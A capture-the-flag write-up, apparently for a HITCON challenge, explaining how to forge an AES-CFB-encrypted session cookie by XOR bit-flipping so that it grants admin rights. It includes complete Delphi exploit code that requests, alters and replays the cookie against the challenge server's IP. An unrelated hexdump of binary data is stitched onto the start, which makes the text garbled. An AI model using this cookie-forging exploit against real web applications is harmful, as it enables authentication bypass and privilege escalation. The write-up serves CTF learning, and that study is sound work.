0002d50: b03d cd97 e6ae 776e cee7 cef5 9c52 4b21  .=....wn.....RK!
0002d60: 272a 8b8f e4a6 c389 0e80 c026 437b 0747  '*.........&C{.G
0002d70: 69a9 7247 f345 2904 06a6 7787 1da4 983e  i.rG.E)...w....>
0002d80: e6a6 7719 83fe 42e7 225d a5f6 f1e1 6869  ..w...B."]....hi
0002d90: efab 4a3a 05a9 9d26 34df 853d ade3 925a  ..J:...&4..=...Z
0002da0: 7c32 3e14 48c7 c8e5 8f3e bdd7 59d5 2cde  |2>.H....>..Y.,.
0002db0: 137c 1792 2b86 203f 6569 655d 1075 c97e  .|..+. ?eie].u.~
0002dc0: 6a10 389a 50a6 9811 b6bc c65c 280e 94fb  j.8.P......\(...
0002dd0: ec45 1cfd bfc6 64be 1f13 04b1 bd4c 811f  .E....d......L..
0002de0: 44d4 8ffa 73f2 50c7 2462 b725 500a efac  D...s.P.$b.%P...
0002df0: a459 5706 3cfb a70e 43bc fe85 3b5c 7e54  .YW.<...C...;\~T
0002e00: 64b2 2229 2d2f 306d 8f28 d7d9 8262 555f  d.")-/0m.(...bU_
0002e10: 6ca3 6436 057d 8773 7819 e991 828b 74dd  l.d6.}.sx.....t.
0002e20: 7a63 1765 b1e2 ea4c 415a a78c 8d66 3f5b  zc.e...LAZ...f?[
0002e30: 564b 67f3 6ac8 825e 2d05 3183 003a 7b43  VKg.j..^-.1..:{C
0002e40: 0ddd f7b5 2c3b 49f6 aa3c 6484 0c47 9193  ....,;I..<d..G..
0002e50: 92c6 f756 6b60 ce6f a5f9 d0de bc47 5359  ...Vk`.o.....GSY
0002e60: 922f 2675 cd91 db20 6bc6 f980 50a4 1e0d  ./&u... k...P...
0002e70: a4ba cf98 382e 840d 8d41 f8ee a2e3 6252  ....8....A....bR
0002e80: 81e0 9200 ef19 7275 e18d f712 ef98 6c84  ......ru......l.
0002e90: 1398 74d3 061e 9a52 9593 0428 fbf5 c8c6  ..t....R...(....
0002ea0: d66f a71f 6e12 6310 19de 6c72 1301 756a  .o..n.c...lr..uj
0002eb0: 8d77 e798 6da0 aadd 8fa5 cc0d 6605 f1bb  .w..m.......f...
0002ec0: 5e4b 7d8a 15a3 df01 687b 5bb2 a553 7ebf  ^K}.....h{[..S~.
0002ed0: 7b63 3b23 11c0 1a39 d299 cd7e 6662 3674  {c;#...9...~fb6t
0002ee0: fac6 62f3 8a2a 45f1 f9ab d63b 055e 2082  ..b..*E....;.^ .
0002ef0: 7eee 508a 76fc dc90 443c d84b 6526 1b54  ~.P.v...D<.Ke&.T
0002f00: 2747 1680 86c0 ffb8 3879 fd2b 10f7 2385  'G......8y.+..#.
0002f10: 8182 5d8b 0954 28b4 d1a7 e651 2b93 b3ef  ..]..T(....Q+...
0002f20: 46c1 69d2 a47c b740 f444 bf9b 10cd 1bb4  F.i..|[email protected]
0002f30: 09c8 7413 bc50 629f 3620 49fe d07f 920b  ..t..Pb.6 I.....
0002f40: ab10 dbf2 ebdb 7067 15e7 cb5c 58c7 f9e8  ......pg...\X...
0002f50: f88b ac6d 82e5 6d96 1b02 6986 885d e76d  ...m..m...i..].m
0002f60: 1e86 887b b7ee 5604 c3fd ae07 0dc6 c597  ...{..V.........
0002f70: d5f3 d5a3 6e31 50f1 50fd 9ce5 4591 a299  ....n1P.P...E...
0002f80: a2fd d6c0 ee1c ecab 0d59 130e 51ce 291b  .........Y..Q.).
0002f90: b758 b9a0 650a 25ff 3158 b537 9e5a e111  .X..e.%.1X.7.Z..
0002fa0: a068 72fc 6064 3c18 b300 220a 428f a33e  .hr.`d<...".B..>
0002fb0: f4ce d292 a575 208d a16a 6d19 3223 11e1  .....u ..jm.2#..
0002fc0: bbd8 c8a9 ecbf 95fe 8613 6d27 7047 db43  ..........m'pG.C
0002fd0: 8026 be69 925c 76ca 9f18 8cd2 4174 4b93  .&.i.\v.....AtK.
0002fe0: e77d 202c 046a 8460 a646 968e eaa8 cf27  .} ,.j.`.F.....'
0002ff0: 97ba 4be0 eb2c 24bc 3560 fff6 337b a454  ..K..,$.5`..3{.T
0003000: a023 cc7b f719 6788 e4d1 452b d8a0 a262  .#.{..g...E+...b
0003010: d896 abb1 bbd9 c15f 9d04 0a8d 5a59 d468  ......._....ZY.h
0003020: 4144 b3d0 f6c9 6025 5fd8 8f3a 7d67 ae4f  AD....`%_..:}g.O

This challenge was solved by and the write up was written by one of my teammates, aljasPOD.

Register with a single letter user & single letter password. The resulting json:

{"username":"a","password":"a","db":"hitcon-ctf"}

Which is encoded with AES-CFB, in 16 byte blocks:

{"username":"a",
"password":"a","
db":"hitcon-ctf"
}

and set as the cookie with the IV.

XORing something to the cyphertext will xor the same to the related cleartext & fuck up the next block.

If we change the 3rd block from

db":"hitcon-ctf"

to

admin":true}

(by xoring the bytes 49-60 and cut off the rest of the cookie), we will have what is needed to become admin.

Our code was (Delphi):

unit Unit3;

interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls;

type
  TForm3 = class(TForm)
    Button1: TButton;
    Edit1: TEdit;
    Edit2: TEdit;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form3: TForm3;

implementation

uses IdTCPClient;

{$R *.dfm}

function EncodeURIComponent(const ASrc: string): UTF8String;
const
  HexMap: UTF8String = '0123456789ABCDEF';

      function IsSafeChar(ch: Integer): Boolean;
      begin
        if (ch >= 48) and (ch <= 57) then Result := True    // 0-9
        else if (ch >= 65) and (ch <= 90) then Result := True  // A-Z
        else if (ch >= 97) and (ch <= 122) then Result := True  // a-z
        else if (ch = 33) then Result := True // !
        else if (ch >= 39) and (ch <= 42) then Result := True // '()*
        else if (ch >= 45) and (ch <= 46) then Result := True // -.
        else if (ch = 95) then Result := True // _
        else if (ch = 126) then Result := True // ~
        else Result := False;
      end;
var
  I, J: Integer;
  ASrcUTF8: UTF8String;
begin
  Result := '';    {Do not Localize}

  ASrcUTF8 := UTF8Encode(ASrc);
    // UTF8Encode call not strictly necessary but
    // prevents implicit conversion warning

  I := 1; J := 1;
  SetLength(Result, Length(ASrcUTF8) * 3); // space to %xx encode every byte
  while I <= Length(ASrcUTF8) do
  begin
    if IsSafeChar(Ord(ASrcUTF8[I])) then
    begin
      Result[J] := ASrcUTF8[I];
      Inc(J);
    end
    else if ASrcUTF8[I] = ' ' then
    begin
      Result[J] := '+';
      Inc(J);
    end
    else
    begin
      Result[J] := '%';
      Result[J+1] := HexMap[(Ord(ASrcUTF8[I]) shr 4) + 1];
      Result[J+2] := HexMap[(Ord(ASrcUTF8[I]) and 15) + 1];
      Inc(J,3);
    end;
    Inc(I);
  end;

   SetLength(Result, J-1);
end;

function DoPost(user: string; pass: string): string;
var C: TIdTCPClient;
    s,s2: string;
    chunked: Boolean;
    ctL: Boolean;
    rem: integer;
    buff: Array of Byte;
    AData: string;
begin
rem := 0;
SetLength(buff,1024);
Result := '';
C := TIdTCPClient.Create;
C.Host := '52.69.244.164';
C.Port := 51913;
C.Connect;
AData := 'username=' + EncodeURIComponent(user) + '&password=' + EncodeURIComponent(pass);
C.IOHandler.WriteLn('POST / HTTP/1.1');
C.IOHandler.WriteLn('Host: 52.69.244.164:51913');
C.IOHandler.WriteLn('Content-Length: ' + IntToStr(Length(AData)));
C.IOHandler.WriteLn('Content-Type: application/x-www-form-urlencoded');
C.IOHandler.WriteLn('');
C.IOHandler.Write(AData);
s := 'a';
chunked := False;
ctl := False;
s2 := '';
while s <> '' do
   begin
   s := C.IOHandler.ReadLn;
   if copy(s,1,12) = 'Set-Cookie: ' then
      begin
      if pos(' auth=',s) > 0 then
         begin
         Result := copy(s,pos(' auth=',s) + 6);
         Result := copy(Result,1,pos(';',Result) - 1);
         end;
      end;
   if copy(s,1,16) = 'Content-Length: ' then
      begin
      ctL := True;
      rem := StrToInt(copy(s,17));
      end;
   if s = 'Transfer-Encoding: chunked' then
      chunked := True;
   s2 := s2 + s;
   end;
s := 'a';
s2 := '';
if not chunked then
   begin
   if ctl then
      begin
      s2 := C.IOHandler.ReadString(rem);
      end
      else
      begin
      while C.IOHandler.Readable(1000) do
         begin
         s := C.IOHandler.ReadLn;
         s2 := s2 + s;
         end;
      end;
   end
   else
   begin
   while True do
     begin
     s := C.IOHandler.ReadLn;
     if s = '0' then
        Break;
     rem := StrToInt('$' + s);
     s2 := s2 + C.IOHandler.ReadString(rem);
     s := C.IOHandler.ReadLn;
     end;
   end;
C.Free;
//ShowMessage(Result);
//Result := s2;
end;

function DoGet(cookie: string): string;
var C: TIdTCPClient;
    s,s2: string;
    chunked: Boolean;
    ctL: Boolean;
    rem: integer;
    buff: Array of Byte;
  x: Integer;
    cck: string;
begin
cck := '';
while cookie <> '' do
   begin
   cck := cck + '%' + copy(cookie,1,2);
   cookie := copy(cookie,3);
   end;
rem := 0;
SetLength(buff,1024);
Result := '';
C := TIdTCPClient.Create;
C.Host := '52.69.244.164';
C.Port := 51913;
C.Connect;
C.IOHandler.WriteLn('GET / HTTP/1.1');
C.IOHandler.WriteLn('Host: 52.69.244.164:51913');
C.IOHandler.WriteLn('Cookie: auth=' + cck);
C.IOHandler.WriteLn('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8');
C.IOHandler.WriteLn('');
s := 'a';
chunked := False;
ctl := False;
s2 := '';
while s <> '' do
   begin
   s := C.IOHandler.ReadLn;
   if copy(s,1,16) = 'Content-Length: ' then
      begin
      ctL := True;
      rem := StrToInt(copy(s,17));
      end;
   if s = 'Transfer-Encoding: chunked' then
      chunked := True;
   s2 := s2 + s;
   end;
s := 'a';
s2 := '';
if not chunked then
   begin
   if ctl then
      begin
      s2 := C.IOHandler.ReadString(rem);
      end
      else
      begin
      while C.IOHandler.Readable(1000) do
         begin
         s := C.IOHandler.ReadLn;
         s2 := s2 + s;
         end;
      end;
   end
   else
   begin
   while True do
     begin
     s := C.IOHandler.ReadLn;
     if s = '0' then
        Break;
     rem := StrToInt('$' + s);
     s2 := s2 + C.IOHandler.ReadString(rem);
     s := C.IOHandler.ReadLn;
     end;
   end;
C.Free;
Result := s2;
end;

procedure TForm3.Button1Click(Sender: TObject);
var s1, s2, s3, s4: string;
    bs: array[1..16] of byte;
    x: Integer;
    ss: string;
    SL: TStringList;
    y: Integer;
    sss: string;
begin
s4 := DoPost('a','b');
Edit1.Text := s4;
s1 := '';
while s4 <> '' do
   begin
   if s4[1] = '%' then
      begin
      s1 := s1 + copy(s4,2,2);
      s4 := copy(s4,4);
      end
      else
      begin
      s1 := s1 + IntToHex(ord(s4[1]),2);
      s4 := copy(s4,2);
      end;
   end;
Edit2.Text := s1;
ShowMessage(DoGet(s1));
s2 := 'db":"hitcon-ctf"';
s3 := 'admin":true}    ';
for x := 48 to 63 do
    begin
    bs[x - 47] := StrToInt('$' + copy(s1,x * 2 + 1,2));
    end;
for x := 1 to 16 do
    bs[x] := bs[x] xor (ord(s2[x]) xor ord(s3[x]));
s4 := copy(s1,1,96);
for x := 1 to 12 do
    s4 := s4 + IntToHex(bs[x],2);
ShowMessage(doget(s4));
end;

end.